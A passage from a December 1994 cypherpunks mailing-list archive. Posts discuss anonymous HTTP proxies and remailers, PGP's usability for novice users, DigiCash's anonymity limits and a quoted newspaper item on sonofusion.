8FKTuk/BY9hjPmrc67dsx67TdQfePfEYVevtRXLLn6G3rQkC0TuLOAtO3cfhwnaJ 8pxYoOjwSpd1Cc/02QMErBrcalJMlJOvjMih/M7pK8QMckkTYve6uZ1bq3z4vFsT wLLmp+v1jCimp0OMaVF2QHyIt+tIPggh5Q67rmndz3wkOzG7KVOO4A== =j2iT -----END PGP SIGNATURE----- From sameer at c2.org Tue Dec 20 13:00:56 1994 From: sameer at c2.org (sameer) Date: Tue, 20 Dec 94 13:00:56 PST Subject: c'punks top 5 In-Reply-To: <199412202030.PAA11794@bwh.harvard.edu> Message-ID: <199412202056.MAA21946@infinity.c2.org> > > It might also be nice to encrypt the connection from client to > proxy. Otherwise, this service only protects you from the server > knowing who you are. If you add encryption, then it begins to offer > anonymity agianst people watching the proxy. (Assuming there are > multiple connections to the proxy.) > If c2.org grew enough to a warrant a fractional T1, it would certainly be willing to run such a service, with prolly swIPed or skronked connections between the client and proxy.. The barriers to me setting it up are: A) Digital postage B) Bandwidth on c2.org (only 14.4 right now) -- sameer Voice: 510-841-2014 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383 http://www.c2.org (or login as "guest") sameer at c2.org From jrochkin at cs.oberlin.edu Tue Dec 20 13:10:33 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Tue, 20 Dec 94 13:10:33 PST Subject: c'punks top 5 Message-ID: At 3:30 PM 12/20/94, Adam Shostack wrote: [> someone else I've lost wrote:] >| A proxy server for HTTP transport so that one could access the web >| anonymously. I don't think coding is the problem here; one could be >| easily hacked out in perl, or you could use CERN HTTPD as a proxy >| server. I think the problem is finding someone who will offer up their >| machine as a place to run this service. > > It might also be nice to encrypt the connection from client to >proxy. Otherwise, this service only protects you from the server >knowing who you are. If you add encryption, then it begins to offer >anonymity agianst people watching the proxy. (Assuming there are >multiple connections to the proxy.) > >Adam Yeah, and ideally the software would allow "chaining" through several anon-proxy-servers, similar to what you can do with the remailers. I think that would give you just about the most security you could expect from such a set-up. From hfinney at shell.portal.com Tue Dec 20 13:36:00 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 20 Dec 94 13:36:00 PST Subject: HTTP redirectors Message-ID: <199412202135.NAA21822@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- I posted some experiments on this a few weeks ago. Some existing web proxies, at least the one at CERN, will accept connections from anyone. Set your proxy server to one of those and you have a bit of anonymity already. There is a problem with trying to get much more anonymity than this - most connections are for a very short period. So there is not as much possibility for batching and mixing as with remailers. Only those connections which are actually active at the same moment could have their in/out mapping confused from the perspective of someone watching the redirector site. So generally our goals have to be somewhat more limited than with remailers. The way proxies work, as I understand it, is that normally when you connect to, say, http://site.org/dir/file.html, it connects to the special port number for http at site.org, then sends it the remainder of the URL, dir/file.html. When you use a proxy, it always connects to the proxy machine, then sends the whole URL (possibly not including the http:, I forget), e.g. site.org/dir/file.html. This way the proxy knows where you want to connect and does that for you. The nice thing about this is that it is already built in to most clients. The bad thing is that it does not lend itself to chaining. Ideally, the purpose of chaining is so that no single link in the chain knows both ends. That way no one person can betray your trust. But with the current client software the very first proxy server sees both your address and your destination, so even if it went on to set up a chain you would have to trust it. One idea that was suggested here would be to have a local proxy process, a very simple one which your fancy client connected to for all your net accesses. This would be where you would implement encryption, or new protocols for chaining, etc. This way we don't have to try to persuade client writers to incorporate our improvements; the existing proxy support provides the loophole we need. One nice feature, for example, would be a full 128 bit IDEA or RC4 encryption engine so that overseas Netscape users (or domestic ones who are stuck with crippled versions) can get good security. However, running this kind of local proxy or a general chaining proxy does require root access. Most systems will not let you create a low-numbered socket unless you are root. So this is not something which people will be able to do from their user accounts. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLvdN/RnMLJtOy9MBAQG4RAIAk6ngvAJvwagoMMyejrvUOJCLQ7Z1CSfm AatsyVIim9++Ehs8wMEXRRyAKp+7/tcOxC0B4f4jk2dqamsZl0YJew== =OQsA -----END PGP SIGNATURE----- From jya at pipeline.com Tue Dec 20 14:08:55 1994 From: jya at pipeline.com (John Young) Date: Tue, 20 Dec 94 14:08:55 PST Subject: NYT on Sonofusion Message-ID: <199412202207.RAA05576@pipe2.pipeline.com> Malcolm Browne writes today on sonoluminescence to produce cold fusion. Nix crypto, no excuso. For email copy send blank message with subject: SON_fuz Some tidbits: New Shot at Cold Fusion By Pumping Sound Waves Into Tiny Bubbles [Drawing caption] New Fusion Recipe: Sound Plus Bubbles Fusion creates great energy but requires tremendous temperatures. In a new approach that scientists hope might reach such temperatures, they are using minuscule bubbles as the focus for sound waves. In this figure, a tiny heating element boils just enough water to create a single micron-sized bubble. A sound field makes the bubble pulsate. As it expands, it absorbs sound energy. Then it violently collapses, launching a spherical, inward-moving supersonic shock wave, which produces enormous temperatures and a flash of light. By Malcolm W. Browne Ever since the first hydrogen bomb was detonated in 1952, scientists have sought to harness thermonuclear fusion as a peaceful power source, but that goal has proved tantalizingly elusive. Now, however, there seems to be an outside chance that a wholly new technique could achieve it. Bombarding microscopic bubbles with intense sound waves could convert the bubbles into minuscule fusion furnaces. Recent experiments by a half-dozen laboratories suggest that a mysterious phenomenon called sonoluminescence may be capable of raising the temperature of gas trapped in a tiny bubble to 1.8 million degrees Fahrenheit or more -- enough, in principle, to ignite fusion. If fusion were achieved, a microbubble could be expected to radiate neutrons, nuclear particles produced by thermonuclear reactions. So far, the laboratories experimenting with sonoluminescence have failed to detected any neutrons, but there are other signs that the project is far from hopeless. *** Lawrence Livermore Laboratory in California, the nation's preeminent hydrogen bomb laboratory, has conducted some small experiments on "sonofusion," the name that would be bestowed on any fusion technique powered by sonoluminescent bubbles. As part of its nuclear weapons research programs during the 1980's, Livermore built the Nova laser, which focuses multiple beams of ultrapowerful lasers from all directions on a small target. Among the targets Livermore has tested are tiny, hollow glass spheres filled with hydrogen isotopes. In a typical experiment, the laser beams are turned on, the glass instantly vaporizes and the resulting shock wave of glass vapor is driven inward to compress the hydrogen. The idea is to get the hydrogen hot enough to initiate fusion. *** Still, the nation's thermonuclear bomb designers eventually solved similar problems for full-scale hydrogen bombs, and Livermore's scientists believe that inertial confinement fusion as a means of generating comparatively cheap electric power will eventually prove to be practical. The tiny bubbles used in sonoluminescence experiments are similar in terms of their fusion physics to their big brothers, hydrogen bombs and on a smaller scale, to the glass spheres used in inertial confinement fusion. ------------------- End tids Note: The NYT advertises an email address for "comments from readers about published articles and suggested areas of coverage": From Michael at lawprof.demon.co.uk Tue Dec 20 14:29:42 1994 From: Michael at lawprof.demon.co.uk (Michael Froomkin) Date: Tue, 20 Dec 94 14:29:42 PST Subject: Digital Telephones in Europe (at least) Message-ID: <742@lawprof.demon.co.uk> I happened to be talking to a friend who works for a Very Large International Corporation. He has just been put in charge of managing their new products division. First on the list is whether and how to become a value added reseller of digital telephones and/or digital telephone services in Europe and evetually worldwide. They would probably include some financial/transactional services as part of the package. He is pro-encryption, but not well informed. What should he insist the telephones have in the way of features? What should he read? He is not an engineer (he used to be a salesman...) but he's smart. I will summarize emailed replies to the list. Please note that this ID expires on Dec. 27. -- Michael Froomkin until Dec. 27: michael at lawprof.demon.co.uk U.Miami School of Law Didsbury, Manchester, England PO Box 248087 Coral Gables, FL 33124-8087 It is NOT warm here From entropy at IntNet.net Tue Dec 20 14:39:17 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Tue, 20 Dec 94 14:39:17 PST Subject: c'punks top 5 In-Reply-To: <199412202030.PAA11794@bwh.harvard.edu> Message-ID: > It might also be nice to encrypt the connection from client to > proxy. Otherwise, this service only protects you from the server > knowing who you are. If you add encryption, then it begins to offer > anonymity agianst people watching the proxy. (Assuming there are > multiple connections to the proxy.) In that case, you could make a local daemon software "wedge" that you'd connect to that would open an encrypted connection to the proxy. Should be rather easy. Like I said before, implementation doesn't seem incredibly hard, but I've not seen a deluge of people offering up their boxes for this use. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Tue Dec 20 14:44:57 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Tue, 20 Dec 94 14:44:57 PST Subject: c'punks top 5 In-Reply-To: <9412202044.AA03402@ch1d157nwk> Message-ID: > I would think that running an anonymous HTTP proxy server is much less likely > to bring people screaming to your sysadmin than an anonymous remailer. Thus > there is a chance that there could be more people willing to put up the > service than even remailers... However, while there may be less chance of > forceful shutdown due to complaints, an anon-http proxy server would probably > consume much more in the way of network resources than a remailer, which will > likely lead to many being shutdown once discovered by the sysadmins > (although, maybe not). On this site, I know that running one would get it killed, me a stern warning, and if I did it again, my account removed. My goal here is *NOT* to piss admins off - and what good are anon-HTTPD's if they're being killed every 10 minutes. What is needed is someone who will offer up their box, that they own or directly control, for this purpose. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From andrew_loewenstern at il.us.swissbank.com Tue Dec 20 15:03:51 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Tue, 20 Dec 94 15:03:51 PST Subject: HTTP redirectors Message-ID: <9412202303.AA04253@ch1d157nwk> > However, running this kind of local proxy or a general chaining > proxy does require root access. Most systems will not let you > create a low-numbered socket unless you are root. So this is not > something which people will be able to do from their user > accounts. Normally a URL can specify an alternate port as well (of course). A common one is http://site.org:8080/dir/file.html... This gets around setting up the proxy without a privileged account. The only web browser I'm familiar with (OmniWeb for NeXTSTEP) also allows you to specify the port number for the proxy. I was under the impression that all browsers supported alternate port numbers for proxies since they are commonly used for URLs... Do Mosiac and Netscape allow specifying the port for proxy servers? andrew From merriman at metronet.com Tue Dec 20 15:19:47 1994 From: merriman at metronet.com (David K. Merriman) Date: Tue, 20 Dec 94 15:19:47 PST Subject: Win NT crypto? Message-ID: <199412202319.AA10519@metronet.com> Does anyone know if any of the 'standard' CP tools (remailers, etc) would run on a Windows NT machine (server edition 3.5)? A couple friends and I are under serious contemplation of setting up an ISP in a town of 100K+, and if it's possible, I'd like to put an anon remailer on it. Thanks... Dave Merriman - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From jamesd at netcom.com Tue Dec 20 15:44:41 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 20 Dec 94 15:44:41 PST Subject: PGP-MIME spec (No Flames Allowed!) In-Reply-To: Message-ID: On Tue, 20 Dec 1994, Nathaniel Borenstein wrote: > I think we now have someone who has > stepped forward to write the new MIME-PGP draft, in consultation with > Phil Zimmerman and myself. A wise precaution. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From chen at intuit.com Tue Dec 20 16:13:33 1994 From: chen at intuit.com (Mark Chen) Date: Tue, 20 Dec 94 16:13:33 PST Subject: cypherpunks mentioned in Z Magazine In-Reply-To: Message-ID: <9412210011.AA02675@doom.intuit.com> > There was an article in Z Magazine about the RC4 disclosure, and IP and > information in general on the internet, in which the cypherpunks were > mentioned. They got a lot of information confused about cypherpunks, but > over all it was an interesting article. Here's the first portion of the > article, in which cypherpunks were given prominence. > If anyone wants to write them and clear up their confusion between > anonymous remailers and mailing lists, or other errors about the 'punks > (which generally cast us in a worse light then we should be), their address > is: > Z Magazine > 18 Millfield St > Woods Hole, MA 02543 As I've explained to Eric privately, I was the victim of a little editorial activism. The sentence about "the Cypherpunks' 'anonymous remailer,' list," is not mine. My original text included a longer description of remailers, which the editors decided to elide for the sake of brevity. This was done without my consent. As to "other errors," please clarify. I certainly had no intention of casting Cypherpunks in a bad light. -- Mark Chen chen at netcom.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From lmccarth at ducie.cs.umass.edu Tue Dec 20 16:42:21 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 20 Dec 94 16:42:21 PST Subject: anon-HTTP server w/o root access Message-ID: <199412210047.TAA10557@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- someone writes: $ an anon-http proxy server would probably consume much more in $ the way of network resources than a remailer, which will $ likely lead to many being shutdown once discovered by the sysadmins That might be somewhat less true on a commercial provider than on an educational or corporate provider, but in any case a WWW anon-server would be seen as a much larger potential security hole than a remailer. A couple of months ago a "friendly" outsider gained unauthorized access to user files here via our Web server, and reported it to the sysadmins. I would have been mighty nervous if I'd been offering anon WWW access to the world. - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvd5y2f7YYibNzjpAQFBlwP/dp2gm/Ek3HOZ89SR0x/XpEXVTeHiHTzy 8QddAR35OrONJBUfZO81NyNXfthSmQEN6+d2GfQ7pm2ZupEpHlunWhokYrd6dnmo 1Cbkzi3/eCt0MsH5cTYKZ/JQ0kPRjEUpJdRaRjAfQf18VMRPpXM8D9SzVp/bwRVs iBiZKFfGkqI= =7jHV - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvd7ACoZzwIn1bdtAQHAiAF6AsXil0bJAgMJpyTJgo7cYW51+Ywz2uIR /bIM2Vew7GoE/yUXoiJkjUzLh35/hRtk =2jos -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Tue Dec 20 16:54:22 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 20 Dec 94 16:54:22 PST Subject: Anon remailer on new ISP ? Message-ID: <199412210059.TAA10637@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Dave Merriman writes: > Does anyone know if any of the 'standard' CP tools (remailers, etc) would > run on a Windows NT machine (server edition 3.5)? A couple friends and I are > under serious contemplation of setting up an ISP in a town of 100K+, and if > it's possible, I'd like to put an anon remailer on it. Great ! Two quick reactions: [] Would it be possible to run an anon-http server on it ? [] If you start a remailer-friendly site, I'd be very surprised if no-one here wanted to get an account there and establish a Windows NT remailer, written from scratch if necessary.... -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvd8tmf7YYibNzjpAQEJGgP+NmDO/UKwXGPC2XcuEJLUQ78T4auvna+l ia5RNXEUVpXVlRrXgARxwN+gnh7AMxBLNNGBZUbawrlwcef8/olb5D7+y5tGp2ja RSbWhwmrOzl2dc/dCJ7fxlsvDc0r0z3/5v0TvYEU+ju3HOP2NoJ5pEl7uVttndqY eyPzdoZTfL8= =KrKW - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvd92CoZzwIn1bdtAQF3mgGAmf8CJP9LyBVJZnWjCq/PFDtEdneMM6kn 4u8pR09jRndd7g/LWf6NaJFnMJCTzsA4 =BKMk -----END PGP SIGNATURE----- From Tony.Gurnick at nzdairy.co.nz Tue Dec 20 16:57:57 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Tue, 20 Dec 94 16:57:57 PST Subject: C code contest Message-ID: <94122016253555@nzdairy.co.nz> Elton at sybase.com wrote: >I gather that this was one of the entries in the "obfuscated 'C'" >programming contests that used to be held some years ago. >(Are they still held?) Yep, Mail chongo at TOAD.COM, co-incedentally T From merriman at metronet.com Tue Dec 20 17:24:02 1994 From: merriman at metronet.com (David K. Merriman) Date: Tue, 20 Dec 94 17:24:02 PST Subject: Anon remailer on new ISP ? Message-ID: <199412210123.AA00621@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- Recycled PGP sig header above :-) >Great ! Two quick reactions: > [] Would it be possible to run an anon-http server on it ? > [] If you start a remailer-friendly site, I'd be very surprised if > no-one here wanted to get an account there and establish a Windows > NT remailer, written from scratch if necessary.... > I expect it will be a remailer-friendly site - the other two guys are even less computer-literate than I am, so I get to be the IS Manager :-/ If the NT-based tools were available, I'd be agreeable (even enthusiastic) about setting up "independent" remailers on it (ie, Tim's Remailer-in-a-box [my box, but what the heck :-]). We're looking at calling the site genisys.net, so additional remailers could be remailer at vogon.com, remailer at flatulnt.com, or whatever. Hell, if all folks wanted was a remailer, I might even be convinced to offer remailer-only accounts at a discount :-) I'm still looking into what kind of magic I need to invoke to get it to all happen in the right order (IP address, then register the domain, do them in parallel, or ???. Any rules/restrictions on what we can call our site (we'll be incorporated, but can we call the site ???.net/org/???], etc.). ObQuestion: whyfor isn't toad set up so that the default reply-to address is the CP list, vice the originator? Recycled signature follows for the benefit of the toad (easier to recycle them than do them from scratch on a plain-Windows box) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvd8tmf7YYibNzjpAQEJGgP+NmDO/UKwXGPC2XcuEJLUQ78T4auvna+l ia5RNXEUVpXVlRrXgARxwN+gnh7AMxBLNNGBZUbawrlwcef8/olb5D7+y5tGp2ja RSbWhwmrOzl2dc/dCJ7fxlsvDc0r0z3/5v0TvYEU+ju3HOP2NoJ5pEl7uVttndqY eyPzdoZTfL8= =KrKW -----END PGP SIGNATURE----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From ddt at lsd.com Tue Dec 20 18:01:52 1994 From: ddt at lsd.com (Dave Del Torto) Date: Tue, 20 Dec 94 18:01:52 PST Subject: GUI: PGP vs novices Message-ID: -----BEGIN PGP SIGNED MESSAGE----- 'Punks, It's time for dave's quarterly "why are we here" post: Well, the good news is that people in "the mainstream" are beginning to notice PGP and discuss the need for its existence. The bad news is that PGP is not really ready for them. As a system administrator for many novice users (hundreds at a time in the past), I can say with humble authority that PGP, no matter how trivially simple it may seem to us, is well beyond the ken of most users (I won't attempt to put a %age on them, let's just say it's well into the 90's). And it's not like no-one's noticing either: - From a pure cost:benefit ratio, PGP is not yet a useful tool for most users. I hate to frame it in such "'mersh" terms when the flow on this list is largely fascinating crypto-math or splendidly colorful insults, but let's admit our dirty little secret: PGP won't be widespread, people won't really appreciate all the good crypto work being done here and repressive government agencies and paranoid lawmakers will continue to whittle away at electronic privacy rights until the day that PGP becomes a widely-used, viable commercial utility. All you ViaCrypt people just sit tight: I'll get to you below. :) I was particularly dis-Mayed by the initial reception that the Netscape folks received here. The Netscape/BofA posting I made recently obviously touched a nerve and well it should. I can certainly understand why Timothy would get CPO (completely pissed off) and want to take a vacation after some of the flotsam I saw drifting by here. As others have noted, some of your remarks were ill-considered and lacked tact. That doesn't make you bad people: I open mouth and insert foot now and then myself, but it's a good thing to consider next time an earnest startup working on a devilishly fasttrack schedule and trying to incorporate crypto comes online here. Let me take this opportunity to offer an olive branch to the Netscape people. Your first shot with SSL is "okay," and I'll do what little I can to help you find/implement/test something better (even if you never return my phone calls, Tom Paquin!). Now then, if you'll bear with me: - ------------------------------------------------- > From: stephen.mccluskey. at hammar.pp.se (Stephen Mccluskey ) > Newsgroups: alt.security.pgp > Subject: Re: I NUKED PGP. Why? This is why: [elided] > Message-ID: <9412160602073878 at hammar.pp.se> [elided] > John Dulaney has received a bit of flak for his statement > that PGP is too complicated for the average user. Although I'm not an > average user, I'd have to agree. The average user in our department can > handle a word processor, do a bit with electronic mail, format a disk and > a few other rudimentary things in DOS, and that's about it. > If PGP is going to take off, it needs to consider their needs by > seamlessly and transparently connecting with both mailers and word > processers, so encrypting and sending a file would be no more complicated > than printing, faxing, or e-mailing the same file. [elided] Actually, what it needs to break down to is a system software extension (to use the Mac as an example) that adds a smart "Encrypt/Decrypt" button (with a "sign" option) to every appropriate document-editing window, since printing, faxing and/or email are ALSO pretty challenging-to-impossible to a vast number of novice users. I'm not trying to insult the novices out there at all (if anything I sympathize with their plight and spend huge chunks of my time explaining the rudiments to them over and over again), I'm just speaking from experience as a sysadmin, tech support manager and educator. - ------------------------------------------------- > From: trimble at beckman.uiuc.edu (Chris Trimble) > Newsgroups: alt.security.pgp > Subject: Re: I NUKED PGP. Why? This is why: [elided] > Message-ID: <3cmuhl$5vu at vixen.cso.uiuc.edu> [elided] > Not everyone in the world who might need/ > want to use PGP is a computer-savvy guy. This is something that I discussed > with the MacPGP developers some two years ago. I offered to rewrite it from > scratch, and was told not to because "there is a much better interface in > development and will be available soon". I still have yet to see any of > that. Me either. BTW, does anyone know what ever happened to Crunch's OOP version for the Mac circa 1993? > MacPGP is an example of a program that violates Apple's HIG up the wahzoo. This is an dramatic understatement, and considering that the MacOS and Windows versions are the most likely candidates for spreading the use of crypto among mainstream users and thus further widening the opening of the barn door referred to in the post about Newt Gingrinch, it's a case of near-criminal neglect on the part of the low-level and interface-level Cypherpunks. I have no problems (well almost none) with the MacPGP versions I've used, but friends/colleagues/students I've exposed it to are generally left dumbfounded. This significantly adds to the difficulty of explaining WHAT cryptography is, explaining WHY they need it and then trying to show them a simple tool for empowering themselves with it. I'd estimate that _maybe_ 10 of the roughly 250+ people I've spent quality time explaining PGP to are still using it. This is the lowest success-rate (measured in persistence of use) of any single piece of software I teach people how to use. This bodes not well for the future of electronic privacy and personal cryptography, especially when you factor in the minute percentage of those people who'll actually cast an informed vote on anything crypto-related in the next election. Not well at all. Time is on the side of the NSA, unfortunately. ViaCrypt has kindly offered to send me a beta of their upcoming Mac version with enhanced AppleEvents support. This promises to open up some scripting capabilities not present in other earlier versions. I'm hopeful that, even if it doesn't differ significantly from MacPGP 2.6ui v1.2, the ViaCrypt app and the tech support that ViaCrypt provides will go a long way toward getting some of my users/clients/students using it, and I'm happy to pass the business along to them in light of their efforts. The Cypherpunks should really launch a new list oriented toward novices with basic questions. It could be a Web page with a question form, or even an email address for the Web-challenged (I may do it, but I welcome any offers to help). As an incentive to Cypherpunks, their friends and colleagues and members of the general public, I'm hereby offering to spend some time answering questions for novice users at either: or . Feel free to spread the word on this FREE (but limited by my time) service I'm offering. When the volume becomes too heavy, I'll ask you all to participate as well by asking you to identify what platform you use and what areas you're particularly savvy in ("Bo Knows Remailers."). Think of it as cypherpunk pro bono work: heck if _lawyers_ can do it, then altruistic 'punks can too, right? Those two addresses are NOW up-and-running, BTW. Both map to the same tech supt account, so circulate the one you think sounds most appropriate. > [MacPGP] completely locks your machine without any kind of dialog box when > you are decrypting or encrypting, the menus aren't particularly related to > the items under them, etc etc. Indeed, MacPGP is the single most un-Maclike app I run regularly, without exception. I've been using it for three years, and while there has been progress, it's been extremely limited, mostly in fixing the most egregious GUI violations and keeping up-to-date with improvements in PGP source code. So IMHO the Cypherpunks, as one of the formost proponents of this technology, are basically shooting themselves in both left feet by not immediately and actively setting aside their wonderful projects to come up with more uncrackable crypto-algorithms (I'm not saying to STOP!) and focus for a few solid months collaborating on two extremely workable, fabulously easy implementations of the most basic functions of PGP for Windows and Mac boxes that any novice user can "plug in" and run alongside the software they use daily (word processors, email apps, even spreadsheets). In addition to the system extension idea above, drag-n-drop apps for Mac desktops that people can plop a WP file on to encrypt/decrypt/sign it and the analog for Windows users should be a SUPER-HIGH PRIORITY starting yesterday. Is it beyond the scope of possibilities to actually get the most code-wise capable people here to stop flaming each other and name-calling and work together for a while? How much bigger a barrel must we be staring down before there's some significant togetherness resulting in visible software? > If the "cypherpunks" really want to see a world of free encryption, then > they should start putting more effort into making that encryption more > comprehensible to the ordinary user. Right now, PGP is a program that isn't, > and is essentially only usable to those who are computer-savvy. Let me cite a small example: a few minutes ago, I let a close personal friend sit down at my workstation to telnet to her email account, and she proceded, while my back was turned for *just a moment*, to close *every dang window* in *all 14 processes* I had running (including some text and a script I'd been editing - grrr) so that she could (get this...) "clean up the screen." I explained in the most non-emotional, non-accusatory terms what she'd just done (without mentioning the hours of work she'd cost me by not saving certain things). Her response mechanism was to tear up and begin to (almost) cry. No, it has nothing to do with the Moon, and yes, this normally a very competent person (errr, computing matters excluded, need I mention?). Anyway, it was my own dang fault, wasn't it? Of course it was: how could _she_ know that there's an easy mechanism for _hiding_ all the windows in the bg processes? That's far too hidden a feature. Sure, there's a "Hide Others" menu item under an iconic menu (cute but cryptic), but what does "Others" refer to? Everyone else in the room who might look over your shoulder? Think about it. For that matter, what the HECK is a "console" window, or a "verbose" menu command? And this is on a friggin' MACINTOSH! We're not even talking Windows here, lads, much less X Windows... or even >gasp< DOS! ;) Anyway, this is just an object lesson on how exCRUciatingly simple crypto is going to have to become. Too bad we can't get it all running by the end of the day, because in half an hour I have to attempt to teach that same friend to use PGP... ...wish me luck. dave _____________________________________________________________ "Civil Liberty Through Easy Cryptography." (ibi, nuntium!) -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLveIhqHBOF9KrwDlAQG4YwQAwqbqD6Qx291kAzSmtJRaReUrIV7/X1WC Hp2j2ABshWe35TFwdc1n8KhShUYljnMCEWvNvTYOzTCFpdLLAf5lOc0tSH1RVYGH kWtoeBEn3ciqBHXBddeQazS0SRm9lAcd4oX3Zwt4wXokE2hnaF3KGamJI2sVZ+Io b3RIBVNJOGI= =9Qwl -----END PGP SIGNATURE----- From hfinney at shell.portal.com Tue Dec 20 18:15:58 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 20 Dec 94 18:15:58 PST Subject: HTTP redirectors In-Reply-To: <9412202303.AA04253@ch1d157nwk> Message-ID: <199412210215.SAA17204@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Andrew Lowenstern writes: >Normally a URL can specify an alternate port as well (of course). A common >one is http://site.org:8080/dir/file.html... This gets around setting up >the proxy without a privileged account. The only web browser I'm familiar >with (OmniWeb for NeXTSTEP) also allows you to specify the port number for >the proxy. I was under the impression that all browsers supported alternate >port numbers for proxies since they are commonly used for URLs... Do Mosiac >and Netscape allow specifying the port for proxy servers? Yes, I think you are right. I think you can set your proxy to site.org:8080 or whatever and clients will use the specified port number. This is at least true of lynx, and I think they all use pretty much the same conventions on this. So I was mistaken in saying that you would need root privileges to set up your own proxy. And I don't see that it would be much of a security hole in that it would be no more privileged than the user who ran it. Most security concerns come because httpd is running as a privileged process, I think. An http redirector shouldn't be much more trouble than a remailer, although the user who is running it would want some assurance that his own files wouldn't be threatened. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLvePsxnMLJtOy9MBAQFehwH/VQ3vCTDL/uGFJidXYnKca4NV+1kK/bQU 5WUFxNl3Qhk2t/zKPUxBnOunkpLXArhQW0TCIb5wDk54Wskh1q2iBA== =Yufk -----END PGP SIGNATURE----- From hfinney at shell.portal.com Tue Dec 20 18:24:18 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 20 Dec 94 18:24:18 PST Subject: No privacy with DigiCash Message-ID: <199412210221.SAA18077@jobe.shell.portal.com> One of the reasons we want http redirectors is so we could buy things anonymously. There is not much point in anonymous digital cash when your web connections advertise who you are. But, the current ecash implementation from DigiCash doesn't allow this to work! When you buy something, the vendor has to know your machine name because he wants to connect back to your ecash wallet process. So even if you did connect via a redirector, your anonymity would be destroyed (or at least badly hurt) when you tell it your machine name so it can connect to you. This is a really bad way of doing it IMO because it seems to defeat one of the big selling points of DigiCash. Is there something I am overlooking, some way to buy things privately with DigiCash? Hal From sommerfeld at orchard.medford.ma.us Tue Dec 20 19:29:01 1994 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Tue, 20 Dec 94 19:29:01 PST Subject: No privacy with DigiCash In-Reply-To: <199412210221.SAA18077@jobe.shell.portal.com> Message-ID: <199412210316.WAA00684@orchard.medford.ma.us> -----BEGIN PGP SIGNED MESSAGE----- > When you buy something, the vendor has to know your machine > name because he wants to connect back to your ecash wallet process. > So even if you did connect via a redirector, your anonymity would be > destroyed (or at least badly hurt) when you tell it your machine > name so it can connect to you. > > Is there something I am overlooking, some way to buy things > privately with DigiCash? Yes... at least one TCP/IP proxy system (socks) lets the client receive incoming connections (the client makes a second connection to the socks server, and the socks server informs it of the addr/port that it's listening on; when a connection comes in to that port, the two incoming connections are gatewayed to each other); that's how socksified FTP works, by the way. Things could get sticky if the server needs to make multiple connections to the wallet at the same address (in sequence or in series), but I'd imagine that this wouldn't be the case.. - Bill -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLveeD7T+rHlVUGpxAQFPmAP/SH8FVIKZJqt1OCTHamxmvILo2kEoz/GP aObHB7X76QWOQXecicGcz/RCKQ7usoHzEI9+P8NkR1yCiZUVAmuK9lFR2YVcDW/Z KkAglcoppBEQjf2bFhTH7D6W9uSLAYii5M0I0tNTUU61riruhn3akeJ0ur0E7Smw xN+lKzXuRUo= =Aiqk -----END PGP SIGNATURE----- From jcorgan at netcom.com Tue Dec 20 19:38:58 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Tue, 20 Dec 94 19:38:58 PST Subject: FW: Opportunity: Software Engineer with TIA Development Team Message-ID: Just an FYI for anyone out there: On Tue, 20 Dec 